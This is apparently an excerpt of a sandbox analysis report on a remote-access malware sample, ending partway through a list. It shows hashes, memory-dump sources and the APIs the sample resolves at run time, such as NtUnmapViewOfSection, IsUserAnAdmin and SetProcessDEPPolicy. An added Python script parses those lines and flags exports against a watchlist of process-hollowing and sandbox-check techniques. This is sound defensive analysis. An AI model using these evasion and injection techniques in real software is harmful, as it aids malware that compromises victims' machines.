                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-4057749079
                                                                                          • Opcode ID: ba79548308126482b15512953ac4dfe1d5c1b9fb0699a181e5e68c996112fe03
                                                                                          • Instruction ID: 62ce9249e39307eb82951da7d6debc9f92203619a9259a5e1e78e5d2bb07f990
                                                                                          • Opcode Fuzzy Hash: ba79548308126482b15512953ac4dfe1d5c1b9fb0699a181e5e68c996112fe03
                                                                                          • Instruction Fuzzy Hash: 4F61B435600305DFDB04EF6AE590BAD7BB1FF48304F048469E205AB36ADB35AD94DB62

                                                                                          Execution Graph

                                                                                          Execution Coverage: 8.2%
                                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                                          Signature Coverage: 0%
                                                                                          Total number of Nodes: 78
                                                                                          Total number of Limit Nodes: 6

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1938023408.000000000A8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_a8e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37885507cec934d0aff0e02b3ca69a35b64a545c32c332fdb1769cd89e1ea85f
                                                                                          • Instruction ID: 2a195d3c00120cc92ed3a8641bd972c6c346846c4151c5595ae2acc69ccf1138
                                                                                          • Opcode Fuzzy Hash: 37885507cec934d0aff0e02b3ca69a35b64a545c32c332fdb1769cd89e1ea85f
                                                                                          • Instruction Fuzzy Hash: 9232CC30B45604CFDB19DBA8D854BAEBBF6AF8A304F254869E106DB391CB75EC01CB51

                                                                                          Control-flow Graph: function starting at 11ed408 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED496
                                                                                          • GetCurrentThread.KERNEL32 ref: 011ED4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 011ED569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: b6cf0a75c5df33800b476e7415f1c90b989b12349cf83299fa7c40c1a749ed58
                                                                                          • Instruction ID: a4a9f1c432952d77069313cdbbdfac538fc68e9cda40643c022a8837f4ed097e
                                                                                          • Opcode Fuzzy Hash: b6cf0a75c5df33800b476e7415f1c90b989b12349cf83299fa7c40c1a749ed58
                                                                                          • Instruction Fuzzy Hash: 845158B0910609CFDB18DFA9E548BDEBBF1EF88318F24C459E019A72A0D7346944CF65

                                                                                          Control-flow Graph: function starting at 11ed418 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED496
                                                                                          • GetCurrentThread.KERNEL32 ref: 011ED4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 011ED569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: cd916252280c737728d0fcba5617ac3f2b8421b866fb87e4c898a007524f5f7e
                                                                                          • Instruction ID: 7287f18546e93cdd436a9b81836053942b3d0483f1886f004da38de753df9305
                                                                                          • Opcode Fuzzy Hash: cd916252280c737728d0fcba5617ac3f2b8421b866fb87e4c898a007524f5f7e
                                                                                          • Instruction Fuzzy Hash: 355157B09106098FDB18DFAAE548BDEBBF1EF88318F24C459E409A7390D7346944CF65

                                                                                          Control-flow Graph: function starting at 11ead88 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 011EAFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: b489a9a3ef1a2e8317db003cba0ee6c52a1be2f23911e2c25de7bda29580f491
                                                                                          • Instruction ID: c28c9ccfa1d1ad167478ca991dfbd0dfd443e138eaf96c1897ac8c99be4ff068
                                                                                          • Opcode Fuzzy Hash: b489a9a3ef1a2e8317db003cba0ee6c52a1be2f23911e2c25de7bda29580f491
                                                                                          • Instruction Fuzzy Hash: DD715870A00B058FDB28DF69E44879ABBF5FF88304F00892DD58AD7A40DB75E945CB91

                                                                                          Control-flow Graph: function starting at 11e590c (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 011E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: c8fb3edf5ec859790158e764ca9cc8ba2a0cd1f3c9222d880acc4a156560c0cf
                                                                                          • Instruction ID: 138b4ecbdf3022fbfaf46cd1f05a93eca3564416f4dbb608530b46064b6c6c98
                                                                                          • Opcode Fuzzy Hash: c8fb3edf5ec859790158e764ca9cc8ba2a0cd1f3c9222d880acc4a156560c0cf
                                                                                          • Instruction Fuzzy Hash: A441E2B5C00619CADB28CFA9C984BCDBBF6BF45708F20846AD408AB255DB756945CF50

                                                                                          Control-flow Graph: function starting at 11e44b4 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 011E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: ad842e392536ab9b4dc5676189ded605c6dc656b97750764633e89dda8a9e387
                                                                                          • Instruction ID: fb96dc86e6aa725716f4bfca55da73956cb37bb68e1b04bf49ff45a26bf9abb6
                                                                                          • Opcode Fuzzy Hash: ad842e392536ab9b4dc5676189ded605c6dc656b97750764633e89dda8a9e387
                                                                                          • Instruction Fuzzy Hash: 6B41D3B4C00719CBDB28CFA9C984B8DBBF6FF45304F20846AD408AB255DB756945CF90

                                                                                          Control-flow Graph: function starting at 11ed658 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011ED6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 72ee4bd7842952b69ef5723f34cf7a8f1d8035b9523a23c47dc7819eb3b4fca7
                                                                                          • Instruction ID: d1ee933df19f7fca842acc9c711a999689df37f28527ce59157b88afd6186072
                                                                                          • Opcode Fuzzy Hash: 72ee4bd7842952b69ef5723f34cf7a8f1d8035b9523a23c47dc7819eb3b4fca7
                                                                                          • Instruction Fuzzy Hash: 083139B5C002499FDB10CFAAD984ADEFFF4EF49320F14815AE958A7251C378A941DF61

                                                                                          Control-flow Graph: function starting at 11ed660 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011ED6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 3c941330fc3c421d9a45b91ec509877b1b5c1b1f4e1e145b426e0e7abfdd9ad3
                                                                                          • Instruction ID: e2396d603b81375ce80de50ff7303e7d3d34e176167b5824f56b1eb799fc8647
                                                                                          • Opcode Fuzzy Hash: 3c941330fc3c421d9a45b91ec509877b1b5c1b1f4e1e145b426e0e7abfdd9ad3
                                                                                          • Instruction Fuzzy Hash: 9721C4B5D002499FDB10CF9AD984ADEBFF9EB48320F14841AE918A7350D378A944CF65

                                                                                          Control-flow Graph: function starting at 11eaf78 (graph edge list omitted; called APIs are listed below)
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 011EAFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: eb697d1fa4726adacd336d961b0e95ba1b7e5043bdb022c86f4918d4e40c2d14
                                                                                          • Instruction ID: 57c0e335a75ca0c6329efea57c50e360bb4835d10b0c2d4f8b6dbafcb7ed6a9a
                                                                                          • Opcode Fuzzy Hash: eb697d1fa4726adacd336d961b0e95ba1b7e5043bdb022c86f4918d4e40c2d14
                                                                                          • Instruction Fuzzy Hash: 6C1110B5C006498FDB24CF9AD444BDEFBF8EF88324F14841AD529A7640C379A545CFA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cba7154750a70574e778b54a14c122b98ba02e7e2a40299c001e1f109aea54e7
                                                                                          • Instruction ID: bfdc7526184976806e3e85f9b88e764fdcca811fdf7af089ba97698cf583bcf5
                                                                                          • Opcode Fuzzy Hash: cba7154750a70574e778b54a14c122b98ba02e7e2a40299c001e1f109aea54e7
                                                                                          • Instruction Fuzzy Hash: 032136B2504200DFCB04DF04C9C0B26BF75FF98324F60C56AE90D0B256C336E856EAA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7fab2bb49bd7394949b23e7e1ee301c2748e0968d2f68b2dd0773bedccf52749
                                                                                          • Instruction ID: e69bd3ba9a4d518510fa6c415d206ebfe5dc657e03b87b7f3d1f18ecbf2ecac2
                                                                                          • Opcode Fuzzy Hash: 7fab2bb49bd7394949b23e7e1ee301c2748e0968d2f68b2dd0773bedccf52749
                                                                                          • Instruction Fuzzy Hash: 692106B2504240DFCB15DF14D9C0B26BF75FF98328F68C56AE9090B256C336D856EBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930687638.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f8d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2328e616d7d7c04a0ab6c9b602214d1c41d78a9dad6f60fc25f0ff8a1ceef601
                                                                                          • Instruction ID: 3d48197d667136182194388824358ad285b301fb8aa2e28d2f1d1fadedf335c0
                                                                                          • Opcode Fuzzy Hash: 2328e616d7d7c04a0ab6c9b602214d1c41d78a9dad6f60fc25f0ff8a1ceef601
                                                                                          • Instruction Fuzzy Hash: D2212571504200DFCB14EF14D9C0B26BB65FF84324F20C56DD80A4B28AC336D807EB61
                                                                                          Memory Dump Source

Execution Graph

Execution Coverage: 1.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.6%
Total number of Nodes: 632
Total number of Limit Nodes: 17

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                          • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                          • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                                          • API String ID: 551388010-2474455403
                                                                                          • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                          • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                                          • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                          • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
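The routine at 0041A8DA above resolves every API it needs at run time: a LoadLibraryA or GetModuleHandleA call is immediately followed by GetProcAddress, and the report prints the export name as the second stack value of the loader call. Rebuilding the (module, export) pairs from those bullet lines is the quickest way to see what the unpacked payload intends to do, and it also exposes the one entry resolved by ordinal (the Shlwapi.dll call passes 0000000C, which GetProcAddress treats as ordinal 12 because its high word is zero). The script below is an added example for this page, not Joe Sandbox or sample code; SAMPLE_LINES is a constructed subset of the lines shown above, and WATCHLIST together with its rationale strings is the author's own triage assumption, not a finding of the report.

```python
"""Rebuild (module, export) pairs from Joe Sandbox 'APIs' lines of a resolver.

Added example for this report page; it is not Joe Sandbox or Remcos code. It
parses the bullet lines the report prints for the LoadLibraryA/GetModuleHandleA
+ GetProcAddress routine at 0041A8DA and flags exports an analyst would want to
look at. WATCHLIST and its rationale strings are this example's assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: a subset of the report's lines for the routine at
# 0041A8DA, copied in the report's own "API.DLL(args), ref: address" format.
SAMPLE_LINES = """
• LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
• GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
• GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
• GetProcAddress.KERNEL32(00000000), ref: 0041A912
• LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
• GetProcAddress.KERNEL32(00000000), ref: 0041A980
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
• GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
• GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
• LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
• GetProcAddress.KERNEL32(00000000), ref: 0041AA33
"""

_LINE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


@dataclass
class ResolvedImport:
    loader: str             # which call obtained the module handle
    module: str             # normalised module name, e.g. "kernel32"
    symbol: Optional[str]   # export name, None when resolved by ordinal
    ordinal: Optional[int]  # ordinal when the name slot holds a small integer
    ref_load: int           # address of the LoadLibrary/GetModuleHandle call
    ref_gpa: Optional[int]  # address of the paired GetProcAddress call


def normalise_module(name: str) -> str:
    """'Kernel32.dll', 'kernel32' and 'kernel32.dll' all map to 'kernel32'."""
    name = name.lower()
    return name[:-4] if name.endswith(".dll") else name


def parse_api_lines(text: str) -> List[ResolvedImport]:
    """Pair each loader call with the GetProcAddress that follows it.

    The report shows the GetProcAddress name argument as the second stack
    value of the preceding loader call, so the pair is rebuilt from adjacency.
    """
    imports: List[ResolvedImport] = []
    pending: Optional[ResolvedImport] = None
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        api = m["api"]
        args = [a.strip() for a in m["args"].split(",")]
        ref = int(m["ref"], 16)
        if api in _LOADERS and len(args) >= 2:
            target = args[1]
            symbol: Optional[str] = None if target == "?" else target
            ordinal: Optional[int] = None
            # GetProcAddress treats a name pointer with a zero high word as an
            # ordinal, so an 8-hex-digit value below 0x10000 is an ordinal import.
            if re.fullmatch(r"[0-9A-Fa-f]{8}", target) and int(target, 16) < 0x10000:
                ordinal, symbol = int(target, 16), None
            pending = ResolvedImport(api, normalise_module(args[0]), symbol, ordinal, ref, None)
            imports.append(pending)
        elif api == "GetProcAddress" and pending is not None:
            pending.ref_gpa = ref
            pending = None
    return imports


# Analyst watchlist: an assumption of this example, chosen for RAT triage.
WATCHLIST = {
    "NtUnmapViewOfSection": "unmaps a target image section; process-hollowing primitive",
    "IsUserAnAdmin": "privilege check, typically gates the persistence path",
    "SetProcessDEPPolicy": "alters the process DEP setting",
    "GlobalMemoryStatusEx": "RAM size query, a common small-VM sandbox check",
    "IsWow64Process": "bitness check before choosing an injection target",
}


def flag_suspicious(imports: List[ResolvedImport]) -> List[Tuple[str, str]]:
    """Return (export, reason) for every watchlisted export, in report order."""
    return [(i.symbol, WATCHLIST[i.symbol]) for i in imports if i.symbol in WATCHLIST]


if __name__ == "__main__":
    resolved = parse_api_lines(SAMPLE_LINES)
    for imp in resolved:
        what = imp.symbol or f"ordinal #{imp.ordinal}"
        print(f"{imp.ref_load:08X} {imp.loader:<16} {imp.module:<9} -> {what}")
    for export, reason in flag_suspicious(resolved):
        print(f"[!] {export}: {reason}")
```

To use it on a full report, paste the "APIs" bullets of the resolver routine into a file and pass its contents to parse_api_lines; the pairing relies only on the loader line and the GetProcAddress line being adjacent, which is how the report orders them. Ordinal imports are reported with their number only, since mapping an ordinal to a name requires the export table of the specific DLL build.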

                                                                                          Control-flow Graph

Control-flow graph for the routine at 004407B5 (graph data omitted): after the call at 004461F8 the routine either exits directly or reads the PEB; on one outcome of that check it calls GetCurrentProcess and TerminateProcess, and every path ends in the call at 0044083A followed by ExitProcess.
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                                                                          • ExitProcess.KERNEL32 ref: 004407EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                          • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                                                                          • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                          • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                                                                                          Control-flow Graph

Control-flow graph for the routine at 0040D3F0 (graph data omitted). Named calls along the graph: OpenMutexA, followed on the success branch by WaitForSingleObject and CloseHandle, then CreateMutexA and GetLastError, GetModuleFileNameW, and several CreateThread calls on the later paths.
                                                                                          APIs
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
